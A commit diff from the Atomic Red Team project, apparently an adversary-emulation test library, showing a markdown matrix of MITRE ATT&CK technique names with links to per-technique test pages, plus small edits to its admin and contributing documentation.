| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | [Account Manipulation](./T1098/T1098.md) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Brute Force](./T1110/T1110.md) | [Application Window Discovery](./T1010/T1010.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](./T1223/T1223.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](./T1193/T1193.md) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Service Scanning](./T1046/T1046.md) | [Pass the Hash](./T1075/T1075.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | [Data Encoding](./T1132/T1132.md) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](./T1088/T1088.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](./T1135/T1135.md) | Pass the Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](./T1197/T1197.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](./T1223/T1223.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](./T1040/T1040.md) | [Remote Desktop Protocol](./T1076/T1076.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](./T1179/T1179.md) | [Password Policy Discovery](./T1201/T1201.md) | [Remote File Copy](./T1105/T1105.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](./T1122/T1122.md) | [Input Capture](./T1056/T1056.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](./T1118/T1118.md) | [Change Default File Association](./T1042/T1042.md) | File System Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kerberoasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Permission Groups Discovery](./T1069/T1069.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](./T1056/T1056.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](./T1179/T1179.md) | [DCShadow](./T1207/T1207.md) | LLMNR/NBT-NS Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](./T1057/T1057.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Mshta](./T1170/T1170.md) | [Component Object Model Hijacking](./T1122/T1122.md) | [Image File Execution Options Injection](./T1183/T1183.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](./T1040/T1040.md) | [Query Registry](./T1012/T1012.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](./T1113/T1113.md) | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [PowerShell](./T1086/T1086.md) | [Create Account](./T1136/T1136.md) | [New Service](./T1050/T1050.md) | DLL Side-Loading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](./T1174/T1174.md) | [Remote System Discovery](./T1018/T1018.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Regsvcs/Regasm](./T1121/T1121.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](./T1140/T1140.md) | [Private Keys](./T1145/T1145.md) | [Security Software Discovery](./T1063/T1063.md) | [Windows Admin Shares](./T1077/T1077.md) | | | [Remote File Copy](./T1105/T1105.md) |
| | [Regsvr32](./T1117/T1117.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disabling Security Tools](./T1089/T1089.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](./T1082/T1082.md) | [Windows Remote Management](./T1028/T1028.md) | | | Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Rundll32](./T1085/T1085.md) | File System Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](./T1055/T1055.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Network Configuration Discovery](./T1016/T1016.md) | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scheduled Task](./T1053/T1053.md) | [Hidden Files and Directories](./T1158/T1158.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Scripting](./T1064/T1064.md) | [Hooking](./T1179/T1179.md) | [Scheduled Task](./T1053/T1053.md) | [File Deletion](./T1107/T1107.md) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | [Uncommonly Used Port](./T1065/T1065.md) |
| | [Service Execution](./T1035/T1035.md) | [Hypervisor](./T1062/T1062.md) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Permissions Modification](./T1222/T1222.md) | | [System Service Discovery](./T1007/T1007.md) | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Signed Binary Proxy Execution](./T1218/T1218.md) | [Image File Execution Options Injection](./T1183/T1183.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File System Logical Offsets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Time Discovery](./T1124/T1124.md) | | | | |
| | [Signed Script Proxy Execution](./T1216/T1216.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](./T1158/T1158.md) | | | | | | |
| | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Scripts](./T1037/T1037.md) | | [Image File Execution Options Injection](./T1183/T1183.md) | | | | | | |
| | [Trusted Developer Utilities](./T1127/T1127.md) | [Modify Existing Service](./T1031/T1031.md) | | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Netsh Helper DLL](./T1128/T1128.md) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | [Windows Management Instrumentation](./T1047/T1047.md) | [New Service](./T1050/T1050.md) | | [Indicator Removal on Host](./T1070/T1070.md) | | | | | | |
| | [Windows Remote Management](./T1028/T1028.md) | [Office Application Startup](./T1137/T1137.md) | | [Indirect Command Execution](./T1202/T1202.md) | | | | | | |
| | [XSL Script Processing](./T1220/T1220.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](./T1130/T1130.md) | | | | | | |
| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [InstallUtil](./T1118/T1118.md) | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Masquerading](./T1036/T1036.md) | | | | | | |
| | | [Registry Run Keys / Startup Folder](./T1060/T1060.md) | | [Modify Registry](./T1112/T1112.md) | | | | | | |
| | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Mshta](./T1170/T1170.md) | | | | | | |
| | | [Scheduled Task](./T1053/T1053.md) | | [NTFS File Attributes](./T1096/T1096.md) | | | | | | |
| | | [Screensaver](./T1180/T1180.md) | | [Network Share Connection Removal](./T1126/T1126.md) | | | | | | |
| | | [Security Support Provider](./T1101/T1101.md) | | [Obfuscated Files or Information](./T1027/T1027.md) | | | | | | |
| | | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Shortcut Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Hollowing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Process Injection](./T1055/T1055.md) | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvcs/Regasm](./T1121/T1121.md) | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Regsvr32](./T1117/T1117.md) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Rootkit](./T1014/T1014.md) | | | | | | |
| | | [Winlogon Helper DLL](./T1004/T1004.md) | | [Rundll32](./T1085/T1085.md) | | | | | | |
| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](./T1223/T1223.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credentials in Files](./T1081/T1081.md) | Domain Trust Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Registry](./T1214/T1214.md) | [File and Directory Discovery](./T1083/T1083.md) | [Pass the Hash](./T1075/T1075.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](./T1193/T1193.md) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](./T1088/T1088.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](./T1046/T1046.md) | Pass the Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data from Local System](./T1005/T1005.md) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](./T1197/T1197.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](./T1135/T1135.md) | [Remote Desktop Protocol](./T1076/T1076.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](./T1223/T1223.md) | [Hooking](./T1179/T1179.md) | [Network Sniffing](./T1040/T1040.md) | [Remote File Copy](./T1105/T1105.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](./T1056/T1056.md) | [Password Policy Discovery](./T1201/T1201.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Email Collection](./T1114/T1114.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](./T1118/T1118.md) | [Change Default File Association](./T1042/T1042.md) | File System Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](./T1122/T1122.md) | [Input Prompt](./T1141/T1141.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](./T1056/T1056.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](./T1179/T1179.md) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kerberoasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Permission Groups Discovery](./T1069/T1069.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Mshta](./T1170/T1170.md) | [Component Object Model Hijacking](./T1122/T1122.md) | [Image File Execution Options Injection](./T1183/T1183.md) | [DCShadow](./T1207/T1207.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](./T1057/T1057.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](./T1113/T1113.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [PowerShell](./T1086/T1086.md) | [Create Account](./T1136/T1136.md) | [New Service](./T1050/T1050.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](./T1040/T1040.md) | [Query Registry](./T1012/T1012.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Regsvcs/Regasm](./T1121/T1121.md) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DLL Side-Loading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](./T1174/T1174.md) | [Remote System Discovery](./T1018/T1018.md) | [Windows Admin Shares](./T1077/T1077.md) | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Regsvr32](./T1117/T1117.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](./T1140/T1140.md) | [Private Keys](./T1145/T1145.md) | [Security Software Discovery](./T1063/T1063.md) | [Windows Remote Management](./T1028/T1028.md) | | | Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Rundll32](./T1085/T1085.md) | File System Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](./T1055/T1055.md) | [Disabling Security Tools](./T1089/T1089.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](./T1082/T1082.md) | | | | [Remote File Copy](./T1105/T1105.md) |
| | [Scheduled Task](./T1053/T1053.md) | [Hidden Files and Directories](./T1158/T1158.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Network Configuration Discovery](./T1016/T1016.md) | | | | [Standard Application Layer Protocol](./T1071/T1071.md) |
| | [Scripting](./T1064/T1064.md) | [Hooking](./T1179/T1179.md) | [Scheduled Task](./T1053/T1053.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Network Connections Discovery](./T1049/T1049.md) | | | | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Service Execution](./T1035/T1035.md) | [Hypervisor](./T1062/T1062.md) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [System Owner/User Discovery](./T1033/T1033.md) | | | | Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Signed Binary Proxy Execution](./T1218/T1218.md) | [Image File Execution Options Injection](./T1183/T1183.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File Deletion](./T1107/T1107.md) | | [System Service Discovery](./T1007/T1007.md) | | | | [Uncommonly Used Port](./T1065/T1065.md) |
| | [Signed Script Proxy Execution](./T1216/T1216.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Web Shell](./T1100/T1100.md) | [File Permissions Modification](./T1222/T1222.md) | | [System Time Discovery](./T1124/T1124.md) | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Scripts](./T1037/T1037.md) | | File System Logical Offsets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | |
| | [Trusted Developer Utilities](./T1127/T1127.md) | [Modify Existing Service](./T1031/T1031.md) | | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Netsh Helper DLL](./T1128/T1128.md) | | [Hidden Files and Directories](./T1158/T1158.md) | | | | | | |
| | [Windows Management Instrumentation](./T1047/T1047.md) | [New Service](./T1050/T1050.md) | | [Image File Execution Options Injection](./T1183/T1183.md) | | | | | | |
| | [Windows Remote Management](./T1028/T1028.md) | [Office Application Startup](./T1137/T1137.md) | | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | [XSL Script Processing](./T1220/T1220.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Removal on Host](./T1070/T1070.md) | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indirect Command Execution](./T1202/T1202.md) | | | | | | |
| | | [Registry Run Keys / Startup Folder](./T1060/T1060.md) | | [Install Root Certificate](./T1130/T1130.md) | | | | | | |
| | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [InstallUtil](./T1118/T1118.md) | | | | | | |
| | | [Scheduled Task](./T1053/T1053.md) | | [Masquerading](./T1036/T1036.md) | | | | | | |
| | | [Screensaver](./T1180/T1180.md) | | [Modify Registry](./T1112/T1112.md) | | | | | | |
| | | [Security Support Provider](./T1101/T1101.md) | | [Mshta](./T1170/T1170.md) | | | | | | |
| | | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [NTFS File Attributes](./T1096/T1096.md) | | | | | | |
| | | Shortcut Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Network Share Connection Removal](./T1126/T1126.md) | | | | | | |
| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Obfuscated Files or Information](./T1027/T1027.md) | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Process Hollowing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Web Shell](./T1100/T1100.md) | | [Process Injection](./T1055/T1055.md) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Winlogon Helper DLL](./T1004/T1004.md) | | [Regsvcs/Regasm](./T1121/T1121.md) | | | | | | |
| | | | | [Regsvr32](./T1117/T1117.md) | | | | | | |
| | | | | [Rootkit](./T1014/T1014.md) | | | | | | |
| | | | | [Rundll32](./T1085/T1085.md) | | | | | | |
| | | | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | [Scripting](./T1064/T1064.md) | | | | | | |
| | | | | [Signed Binary Proxy Execution](./T1218/T1218.md) | | | | | | |
@@ -52,5 +55,6 @@
| | | | | [Timestomp](./T1099/T1099.md) | | | | | | |
| | | | | [Trusted Developer Utilities](./T1127/T1127.md) | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | [XSL Script Processing](./T1220/T1220.md) | | | | | | |
docs/admin.md
+14
View File
@@ -0,0 +1,14 @@
---
layout: default
---
# Project Administration Resources
Resources and procedures related to administration of the Atomic Red Team
project.
## Updating enterprise-attack.json
[This file]({{ site.github.repository_url }}/blob/master/atomic_red_team/enterprise-attack.json) is a simple mirror of
https://github.com/mitre/cti/blob/master/enterprise-attack/enterprise-attack.json,
and should be updated as needed to maintain currency with Enterprise ATT&CK
tactics and techniques.
docs/contributing.md
+3 -2
View File
@@ -43,7 +43,7 @@ so you can get to work.
bin/new-atomic.rb T1234
```
> Don't have Ruby? Use the Atomic Test template [here](./atomic_red_team/atomic_test_template.yaml) as a starting point for your new test.
> Don't have Ruby? Use the Atomic Test template [here]({{ site.github.repository_url }}/blob/master/atomic_red_team/atomic_test_template.yaml) as a starting point for your new test.
Fill in the TODOs with the information for your test. See the [Atomic Test structure](#atomic-test-structure) section below.
@@ -70,7 +70,8 @@ instructions to create a new Pull Request.
## Atomic Test structure
